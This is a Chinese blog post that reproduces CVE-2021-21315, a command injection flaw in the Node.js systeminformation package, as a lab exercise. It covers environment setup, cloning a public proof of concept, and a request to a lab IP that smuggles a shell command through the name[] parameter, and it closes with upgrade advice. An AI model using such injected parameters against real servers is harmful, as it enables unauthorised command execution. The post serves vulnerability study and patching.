CVE-2021-21315

最新推荐文章于 2025-05-28 23:03:44 发布
最新推荐文章于 2025-05-28 23:03:44 发布
阅读量2.3k 收藏
点赞数
分类专栏: 漏洞复现 linux sudoNode.js 文章标签: 安全漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48300170/article/details/118891918
版权

CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现

漏洞简介

      Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。
      2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞CVE-2021-21315,攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。

影响版本
    Systeminformation < 5.3.1

漏洞信息

漏洞名称漏洞编号危害等级
Linux sudoNode.js命令注入漏洞CVE-2021-21315高危
CVSS评分漏洞组件受影响版本
7.8Node.js-systeminformationSysteminformation < 5.3.1

环境搭建

  • Linux操作系统(Ubuntu)
  • nodejs(linux)

漏洞复现

1.Nodejs安装

Wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz

tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
sudo mv nodejs/ /usr/local/sbin/
sudo ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
sudo ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

2.POC下载

git clone git://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

3.nodejs起http

node index.js

4.执行poc

http://192.168.32.161:8000/api/getServices?name[]=$(echo -e ‘NULL’ > 1.txt)

漏洞修复

  • 建议将 systeminformation 及时升级到 5.3.1 或更高版本
deepseek官方常用提示库
猫敷雪
02-12 176
优化后的代码不仅提高了效率,还完善了边界情况的处理。记忆化递归和迭代法都是有效的优化手段,具体选择哪种方法取决于具体需求和场景。输入weight数组(物品重量),value数组(物品价值),bagweight(背包容量)。输出:在背包容量为bagweight时,选择不同物品组合所能获得的最大价值。算法:动态规划,通过构建二维数组dp来记录每一步的最优解。
全面解读《DeepSeek:从入门到精通》——深度学习DeepSeek的必备指南
老崔的博客
02-14 380
书中详细阐述了DeepSeek模型的各个方面及其在实际应用中的广泛用途,无论是理论知识还是实际操作,都能为读者提供系统的指导。该书不仅讲解了深度学习的核心概念和核心算法,还通过实际案例和详尽的实例分析,帮助读者掌握如何使用DeepSeek模型进高效的训练和优化。无论您是刚刚入门的学习者,还是具备一定基础的研究人员,都能从本书中获得宝贵的知识,助力大家在AI领域不断突破与进步。我们已经将《DeepSeek:从入门到精通》的相关资源上传至网盘,您只需长按下方二维码,添加微信即可获得资源下载地址。
DeepSeek 技术支撑书籍推荐
全栈若城,专注知识分享
02-06 4402
本书全面阐述了神经网络的基本原理,从神经元模型到多层神经网络的构建,讲解细致入微。在深度学习部分,详细介绍了卷积神经网络(CNN)、循环神经网络(RNN)及其变体 LSTM、GRU 等。对于理解 DeepSeek 在处理图像、语音等多模态数据时所依赖的神经网络基础,这本书提供了扎实的理论知识。
清华大学 DeepSeek 三部曲:从入门到职场跃迁与个人红利指南
m0_63171455的博客
02-19 1302
在 AI 技术重塑生产与协作的今天,DeepSeek 作为国产大模型领域的“清华系”代表,正以更低成本、更高精度推动千百业变革。然而,技术迭代速度远超普通人适应能力——有人焦虑“AI 取代”,有人困于“提示语无效”,更多人则在信息碎片中迷失方向。为此,清华大学联合元石科技推出 DeepSeek 三部曲,从技术原理拆解到商业场景落地,再到个人能力跃迁,形成“学-用-赢”闭环,助你抢占 AI 时代先机。
岫珩的专栏推荐
博客主要分享技术教程、工具教程、bug解决、前沿技术动态、编程经验、心得感悟等。 内容同步、干货获取、推广宣发请看侧栏推广信息
03-07 620
以下为推荐阅读的专栏内容,供学习和参考。
学习和使用DeepSeek已是势在必,清华大学《DeepSeek学习手册》(全5册)
2501_90570130的博客
03-03 526
DeepSeek爆火期间,清华大学真的是非常良心,先后推出了5份免费的电子书,分别是。第4版《DeepSeek+DeepResearch》第3版《普通人如何抓住DeepSeek红利》第2版《DeepSeek如何赋能职场应用》第1版《DeepSeek从入门到精通》第5版《DeepSeek与AI幻觉》给大家整理到一起了,有需要的自取。
DeepSeek最强使用攻略,1000个神级提示词,让你成为AI高手
02-13
├── Deepseek不好用,是你真的不会用啊!.pdf ├── DeepSeek最强使用攻略,放弃复杂提示词,直接提问效果反而更好?.pdf ├── DeepSeek小白使用指南,99% 的人都不知道的使用技巧(建议收藏)docx.pdf ├...
安全必读DeepSeek接口调用中的数据加密与合规实践.pdf
02-20
在日常的工作和学习中,你是否常常为处理复杂的数据、生成高质量的文本或者进精准的图像识别而烦恼?DeepSeek 或许就是你一直在寻找的解决方案!它以其高效、智能的特点,在各个业都展现出了巨大的应用价值。...
清华大学DeepSeek手册政企、创业者必读.pdf
04-28
清华大学DeepSeek手册政企、创业者必读.pdf
还在为 DeepSeek 服务器繁忙烦恼?发现一款可以免费无限制的满血 DeepSeek 工具分享给大家!
02-20
随着人工智能和大数据的发展,服务器的稳定性和性能成为了企业和开发者们关注的焦点。...这款免费的“满血DeepSeek”工具,无疑是解决服务器繁忙问题的一个很好的选择,但在使用时仍需保持警惕,确保安全。
DeepSeek的魔法:如何让复杂概念变得通俗易懂?
wxaiway的博客
02-12 1821
日常生活中,常常会被复杂的概念所困扰。怎么样将这些晦涩难懂的概念变得通俗易懂?当然是利用大模型帮我们解答,不过让大模型解答也需要有好的沟通提示词。 
增长黑盒XDeepSeek:一起推荐10本2024年读过的好书
增长黑盒Growthbox
01-29 860
给各位读者拜个年,我是yolo@增长黑盒!以书会友,是理工人的终极浪漫。所以,每逢过年我都要为大家推荐一批自己读过的好书。但我今天突然想到,如果还是一板一眼来写推荐语,就有点太无聊了(主要是懒得写)。巧了,正好赶上DeepSeek这个“国运级别”的突破,于是我果断将其招至麾下,用写古诗的方式为大家推荐10本有意思的书!workflow:豆包&Kimi&DeepSeekV3总结全书内...
DeepSeek狂潮之下,推荐三本AI相关的好书
2401_85375151的博客
02-04 1159
最近DeepSeek震惊了全球AI界,所有人都在讨论这个中国研发的低成本高智能的AI大模型,热度还在持续,事情还在继续发酵,让子弹再飞一会儿。由于受到DDOS攻击,DeepSeek经常用不了,我在自己的电脑上部署了一个,代码开源就是好。感叹DeepSeek掀起如此狂潮的同时,也推荐几本人工智能相关的书,这几本书不是实践或技术类的工具书,更偏向于社会学和哲学思考。第一本,《教育新语》作者是可汗学院创始人,萨尔曼·可汗。教育的本质究竟该如何精准定义?怎样为学生搭建更优质的学习环境?
清华大学《DeepSeek从入门到精通》!其他文档在它面前简直是小学生!(附书籍链接)
爱吃大米饭C的博客
02-11 5536
最近清华大学新闻与传播学院出了一份《DeepSeek从入门到精通》,详细教给你DeepSeek是什么以及DeepSeek能够做什么,比外面很多博主卖的课更专业详细,重点是这是免费的。要专业有专业,要深度有深度,要操作也给了你具体的执流程。很多人关心的deepseek应用在图表、海报、PPT的制作还有如何批量制作短视频脚本以及批量生成自媒体文案,应有尽有。
DeepSeek 书籍推荐
加入“Super Entity”,与全能开发团队共探AI智能体与数字人项目,开启前沿技术之旅。
02-28 1526
书中将提示词的运用比作施展魔法,汇聚了大量实用的提示词案例和方法,适用于自然语言处理、图像生成等多种 AI 应用场景,教你如何通过巧妙的提示词发挥 AI 的最大潜力。
深入学习DeepSeek Coder:全方位学习资源推荐
gitblog_02894的博客
01-15 1064
深入学习DeepSeek Coder:全方位学习资源推荐 deepseek-coder-6.7b-instruct 项目地址: https://gitcode.com/mirrors/deepseek-ai/deepseek-c...
玩转 DeepSeek 必读书籍
全栈若城,专注知识分享
02-06 3741
Prompt 魔法》将提示词的运用比作施展魔法,汇聚了大量实用的提示词案例和方法。适用于自然语言处理、图像生成等多种 AI 应用场景,教你如何通过巧妙的提示词发挥 AI 的最大潜力。
DeepSeek教程书籍新鲜出炉
zhuluzhongyuan87的博客
03-10 195
亲爱的朋友们,AI时代已经悄然来临,但请不必惊慌!我发现了一本极为实用的书籍——《AI时代生存手册:DeepSeek零基础入门》。它采用浅显易懂的语言,详尽阐述了DeepSeek的强大功能。从基础操作到进阶应用,书中通过循序渐进的方式引导你轻松入门。无论你是职场新人还是希望提升工作效率的资深员工,这本书都将是你的不二之选。书中满载实战案例,配以详尽的图解,让你轻松掌握DeepSeek的使用技巧。例如,利用DeepSeek数据分析,复杂的表格处理只需几分钟便能轻松搞定,从此告别熬夜加班的烦恼。
上交具身机器人的视觉运动导航!HTSCN:融合空间记忆与语义推理认知的导航策略
最新发布
weixin_37990186的博客
05-28 891
论文提出的HTSCN框架通过将空间记忆和语义推理能力无缝集成到一个端到端的系统中,显著提升了机器人在未知环境中的导航性能和路径效率。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值